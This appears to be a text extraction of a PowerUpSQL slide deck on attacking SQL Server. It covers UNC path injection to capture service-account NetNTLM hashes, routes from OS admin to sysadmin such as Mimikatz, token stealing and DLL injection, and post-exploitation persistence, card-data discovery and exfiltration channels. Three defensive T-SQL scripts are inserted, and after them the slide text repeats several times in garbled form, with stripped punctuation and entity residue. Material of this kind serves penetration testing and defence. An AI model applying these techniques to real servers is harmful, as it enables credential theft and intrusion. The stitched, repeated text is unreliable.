1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Escalating Privileges
UNC Path Injection

Escalating Privileges: UNC Path Injection
UNC Path Injection Summary
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts

Escalating Privileges: UNC Path Injection
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
• xp_dirtree
• xp_fileexist

Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.

Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
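The defensive counterpart to the slides above, added here as an example that is not part of the PowerUpSQL deck or toolkit: a T-SQL script that lists who currently holds EXECUTE on the two file-path procedures in master, removes the default grant to PUBLIC, re-grants it to a narrow role for the few non-sysadmin users who need the SSMS file browser, and starts an Extended Events session that records every remaining call together with the login, host and application that made it. The role name file_browse_users, the session name unc_probe_watch, its file name and the example domain user are assumptions; run it in master as a sysadmin.

```sql
-- Added example, not part of the PowerUpSQL deck: audit and close the default
-- PUBLIC grant on xp_dirtree / xp_fileexist, then record any remaining callers.
-- Run in master as a sysadmin. Names marked "assumed" are placeholders.
USE master;
GO

-- 1. Who can execute the two file-path procedures right now?
--    On a default install this returns a GRANT row for grantee 'public' on each.
SELECT  o.name           AS procedure_name,
        dp.name          AS grantee,
        dp.type_desc     AS grantee_type,
        perm.state_desc  AS grant_or_deny
FROM    sys.objects               AS o
JOIN    sys.database_permissions  AS perm ON perm.major_id = o.object_id
                                          AND perm.class = 1                    -- object-level
                                          AND perm.permission_name = N'EXECUTE'
JOIN    sys.database_principals   AS dp   ON dp.principal_id = perm.grantee_principal_id
WHERE   o.name IN (N'xp_dirtree', N'xp_fileexist')
ORDER BY o.name, dp.name;
GO

-- 2. Remove the default grant. Sysadmins are unaffected (they bypass permission
--    checks); every other login loses the ability to make the service account
--    reach out to an arbitrary UNC path through these two procedures.
REVOKE EXECUTE ON xp_dirtree   FROM public;
REVOKE EXECUTE ON xp_fileexist FROM public;
GO

-- 3. Non-sysadmin users who legitimately need the SSMS backup/restore file browser
--    (it calls these procedures) get a scoped grant through a role (name assumed).
IF DATABASE_PRINCIPAL_ID(N'file_browse_users') IS NULL
    CREATE ROLE file_browse_users;
GRANT EXECUTE ON xp_dirtree   TO file_browse_users;
GRANT EXECUTE ON xp_fileexist TO file_browse_users;
-- The user must already exist in master; example principal name is assumed:
-- ALTER ROLE file_browse_users ADD MEMBER [DOMAIN\dba_user];
GO

-- 4. Record every remaining call with the login, host and application behind it,
--    so an unexpected caller shows up in the .xel file (session/file names assumed).
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = N'unc_probe_watch')
    DROP EVENT SESSION unc_probe_watch ON SERVER;
GO
CREATE EVENT SESSION unc_probe_watch ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE (sqlserver.like_i_sql_unicode_string(statement, N'%xp_dirtree%')
        OR sqlserver.like_i_sql_unicode_string(statement, N'%xp_fileexist%'))),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE (sqlserver.like_i_sql_unicode_string(statement, N'%xp_dirtree%')
        OR sqlserver.like_i_sql_unicode_string(statement, N'%xp_fileexist%')))
ADD TARGET package0.event_file (SET filename = N'unc_probe_watch')
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION unc_probe_watch ON SERVER STATE = START;
GO
```

Run step 1 again after step 2 to confirm that the only remaining EXECUTE rows belong to the role. The Extended Events session matches on the statement text, so it catches both ad-hoc batches and RPC calls; a call from a login that is not in the role is the signal worth alerting on, because after the revoke it should fail with a permission error rather than reach the network.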
Escalating Privileges
OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x x
Single User Mode x x x x x
Below are some options for leveraging that knowledge.

Escalating Privileges: OS Admin to SysAdmin
Here are some tool options (approach: common tools):
• Access as Local Administrator: Management Studio, sqlcmd and other native SQL client tools
• Access as LocalSystem: PsExec, accessibility options, debugger, with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
Common Post Exploitation Activities

Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
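A defender's check for item 1, added here as an example that is not part of the PowerUpSQL deck or toolkit: read-only T-SQL that enumerates the SQL Server layer persistence points the slide names (startup procedures, server-scoped triggers, agent job steps that run OS commands or PowerShell, database DDL triggers, and code modified recently in every online database). The 7-day window is an assumption; run it as a sysadmin.

```sql
-- Added example, not part of the PowerUpSQL deck: enumerate SQL Server layer
-- persistence points. Read-only; run as sysadmin. The 7-day window is assumed.
USE master;
GO

-- Startup procedures run under the service account every time the instance starts.
SELECT  SCHEMA_NAME(p.schema_id) + N'.' + p.name AS startup_procedure,
        p.create_date, p.modify_date
FROM    sys.procedures AS p
WHERE   OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;

-- Server-scoped DDL and logon triggers fire on every login or server-level DDL event.
SELECT  t.name AS trigger_name, e.type_desc AS fires_on, t.is_disabled, t.modify_date
FROM    sys.server_triggers       AS t
JOIN    sys.server_trigger_events AS e ON e.object_id = t.object_id
ORDER BY t.modify_date DESC;

-- Agent job steps that run OS commands or PowerShell, or call xp_cmdshell from T-SQL.
SELECT  j.name AS job_name, j.enabled, SUSER_SNAME(j.owner_sid) AS owner,
        s.step_name, s.subsystem, s.database_name, s.command, j.date_modified
FROM    msdb.dbo.sysjobs     AS j
JOIN    msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE   s.subsystem IN (N'CmdExec', N'PowerShell')
   OR   s.command LIKE N'%xp_cmdshell%'
ORDER BY j.date_modified DESC;

-- Modified code and database DDL triggers across every online database.
-- Database DDL triggers live only in sys.triggers, so they are listed separately;
-- the schema is joined per database because SCHEMA_NAME() resolves in master.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql = @sql + N'
SELECT ' + QUOTENAME(d.name, '''') + N' AS database_name,
       s.name + N''.'' + o.name AS object_name, o.type_desc, o.modify_date
FROM ' + QUOTENAME(d.name) + N'.sys.objects AS o
JOIN ' + QUOTENAME(d.name) + N'.sys.schemas AS s ON s.schema_id = o.schema_id
WHERE o.type IN (''P'', ''TR'', ''FN'', ''IF'', ''TF'', ''V'')
  AND o.modify_date > DATEADD(day, -7, SYSDATETIME())
UNION ALL
SELECT ' + QUOTENAME(d.name, '''') + N', t.name, N''DATABASE_DDL_TRIGGER'', t.modify_date
FROM ' + QUOTENAME(d.name) + N'.sys.triggers AS t
WHERE t.parent_class = 0
UNION ALL'
FROM   sys.databases AS d
WHERE  d.state_desc = N'ONLINE';

-- Drop the trailing UNION ALL (9 characters) and sort newest change first.
SET @sql = LEFT(@sql, LEN(@sql) - 9) + N' ORDER BY database_name, modify_date DESC;';
EXEC sys.sp_executesql @sql;
GO
```

Baseline the output once and diff it on a schedule: a new startup procedure, a logon trigger nobody remembers creating, or a CmdExec job step owned by an unexpected login is the shape an attacker's persistence takes at this layer. The OS-layer items from the slide (registry and file auto runs, scheduled tasks, services) are outside what T-SQL can see and need a host-side check.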
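A defender's version of item 2, added here as an example that is not part of the PowerUpSQL deck or toolkit: T-SQL that lists transparently encrypted databases (TDE protects the files at rest, not data read through a query), then runs a pattern prefilter and a Luhn check over constructed column samples, the way a data-classification sweep narrows down which columns hold card numbers before they are tokenised or purged. The function name fn_LuhnValid, the use of tempdb, and the sample table and values are assumptions.

```sql
-- Added example, not part of the PowerUpSQL deck: locate TDE databases and test
-- column samples for card-number-like values. Table, columns and values below are
-- constructed; the Luhn check is plain T-SQL so it runs without CLR or PowerShell.
USE tempdb;
GO

-- Which databases are transparently encrypted? Anyone who can query them still
-- reads the data in clear, so TDE is not a reason to skip the column sweep.
SELECT  DB_NAME(k.database_id) AS database_name, k.encryption_state,
        k.key_algorithm, k.key_length
FROM    sys.dm_database_encryption_keys AS k;
GO

-- Luhn check: keep the digits of @value, reject lengths outside 13-19, then apply
-- the mod-10 checksum (double every second digit from the right, subtract 9 if > 9).
CREATE FUNCTION dbo.fn_LuhnValid (@value nvarchar(64))
RETURNS bit
AS
BEGIN
    DECLARE @digits varchar(64) = '', @i int = 1, @c char(1);
    WHILE @i <= LEN(@value)
    BEGIN
        SET @c = SUBSTRING(@value, @i, 1);
        IF @c LIKE '[0-9]' SET @digits = @digits + @c;
        SET @i = @i + 1;
    END;
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;

    DECLARE @sum int = 0, @pos int = LEN(@digits), @dbl int = 0, @d int;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @dbl = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
        SET @sum = @sum + @d;
        SET @dbl = 1 - @dbl;
        SET @pos = @pos - 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Constructed column samples standing in for what a keyword search over
-- INFORMATION_SCHEMA.COLUMNS (name LIKE '%card%', '%pan%', '%notes%') would pull back.
DECLARE @sample TABLE (table_name sysname, column_name sysname, value nvarchar(64));
INSERT INTO @sample VALUES
    (N'dbo.Customers', N'Notes', N'4111 1111 1111 1111'),  -- constructed, Luhn-valid test PAN
    (N'dbo.Customers', N'Notes', N'4111111111111112'),     -- fails the checksum
    (N'dbo.Orders',    N'Ref',   N'ORD-2023-000017'),      -- too few digits to be a PAN
    (N'dbo.Staff',     N'Phone', N'+1 612 555 0100');      -- phone number, filtered early

-- Cheap pattern prefilter first (two runs of four digits), Luhn only on survivors.
SELECT  table_name, column_name, value
FROM    @sample
WHERE   value LIKE '%[0-9][0-9][0-9][0-9]%[0-9][0-9][0-9][0-9]%'
  AND   dbo.fn_LuhnValid(value) = 1;
GO
```

Only the first constructed row survives both filters: the second has the right shape but fails the checksum, the third has too few digits, and the phone number never passes the prefilter. Against real tables, sample a few hundred rows per candidate column rather than scanning whole tables, and treat a hit as a data-handling finding (tokenise, mask, or delete) rather than as something to copy.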
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
